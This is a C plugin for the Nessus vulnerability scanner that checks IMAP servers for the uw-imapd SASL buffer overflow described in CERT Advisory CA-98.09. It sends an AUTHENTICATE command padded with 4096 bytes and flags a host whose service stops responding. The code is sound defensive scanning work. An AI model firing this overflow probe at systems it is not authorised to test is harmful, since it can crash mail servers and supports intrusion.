/*
 * 
 * imap
 *
 * This plugin was written by Renaud Deraison and is released
 * under the GPL
 *
 */
#include <includes.h> 

#define NAME "uw_imapd buffer overflow"
#define DESC "\
CERT Advisory CA-98.09 - imapd : \n\
The CERT Coordination Center has received reports regarding a buffer\n\
overflow in some implementations of IMAP servers. The overflow is in library\n\
code from the University of Washington IMAP server that handles SASL\n\
server-level authentication. This vulnerability is different from the one\n\
discussed in CERT Advisory CA-97.09.imap_pop. Information about this\n\
vulnerability has been posted to various public mailing lists and\n\
newsgroups.\n\
\n\
All versions of the University of Washington IMAP server prior to the final\n\
(frozen, non-beta) version of imap-4.1 that support SASL server-level\n\
authentication are vulnerable. The vulnerability affects all University of\n\
Washington IMAP4rev1 servers prior to v10.234. Also, any v10.234 server that\n\
was distributed with Pine 4.0 or any imap-4.1.BETA is vulnerable.\n\
\n\
Additionally, the vulnerability is present in other IMAP servers that use\n\
library code from the University of Washington IMAP server to handle SASL\n\
server-level authentication.\n\n\
Risk factor : high"
#define COPYRIGHT "no copyright"
#define SUMM "uw-imapd buffer overflow"



PlugExport int plugin_init(struct arglist *desc);
PlugExport int plugin_init(struct arglist *desc)
{
	plug_set_name(desc, NAME);
	plug_set_description(desc, DESC);
	plug_set_summary(desc, SUMM);
	plug_set_copyright(desc, COPYRIGHT);
	plug_set_category(desc, ACT_GATHER_INFO);
	plug_set_family(desc, "Gain root remotely");
	return(0);
}

     

PlugExport int plugin_run(struct arglist * args);	
PlugExport int plugin_run(struct arglist * args)
{
 if(host_get_port_state(args, 143)>0)
  {
   int soc = open_sock_tcp(args, 143);
   if(soc<0)return(0);
   else
   {
   char * buf = emalloc(4096);
   char * command;
   
   memset(buf, 'A', 4096);
   command = emalloc(5000);
   
   recv_line(soc, command, 2048);
   sprintf(command, "* AUTHENTICATE {4096}\r\n%s\r\n", buf);
   efree(&buf);
   send(soc, command, strlen(command), 0);
#ifndef NESSUS_NT
   signal(SIGPIPE, SIG_IGN);
#endif

   recv_line(soc, command, 2048);
   if(!strlen(command))
   post_hole(args, 143, 
"The remote imap-uw is subject to a buffer overrun attack\n\
which may allow any remote user to become root easily\n\
Solution :  Install the most recent version of imapd");
   socket_close(soc);
   efree(&command);
   }
  }
 return(0);
}
